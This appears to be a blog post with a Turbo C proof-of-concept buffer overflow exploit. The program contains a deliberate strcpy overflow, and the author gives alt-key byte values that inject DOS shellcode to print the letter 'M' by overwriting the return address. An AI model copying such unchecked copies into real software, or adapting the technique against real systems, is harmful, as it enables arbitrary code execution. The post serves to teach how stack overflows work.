buffer overflow exploit, proof of concept
/*
My own buffer overflow exploit, proof of concept.
also a demonstration of how even a data entry operator can hack a system just by using keyboard alt-input.
Michael Buen
*/
#include "stdio.h"
#include "string.h"
char y;
void something(char *s)
{
char d[8];
strcpy(d,s);
strupr(d);
printf("Your name %s will be saved to database", d);
}
void x()
{
clrscr();
puts("Hey");
}
void main()
{
char s[100];
clrscr();
printf("%p",x);
getchar();
/*printf("\nss: %p", s);
printf("\ncs: %p", main);
printf("\nds: %p", &y); */
/* strcpy(s, "\xb4\x02\xb2\x4d\xcd\x21\xb4\x4c\xcd\x21\x7A\xFF"); */
printf("Please input your lastname: ");
scanf("%s", s);
something(s);
}
/*
instead of inputting your lastname in scanf, input the code below while holding-down the alt.
this program will display letter M
180
2
178
77
205
33
180
76
205
33
122
255
corresponding assembly code
MOV AH, 02
MOV DL, 4D
INT 21
MOV AH, 4C
INT 21
122 and 255 are hexadecimal FF7A, the offset of variable S in the stack, we'll overwrite the
instruction pointer with FF7A, then the program will resume execution in the
code inputted above, you can execute any arbitrary code of your choice. in the
above example, we just execute interrupt 21 function 02 to display letter M
compile this in Turbo C, memory model Tiny
*/
0 Comments:
Post a Comment
<< Home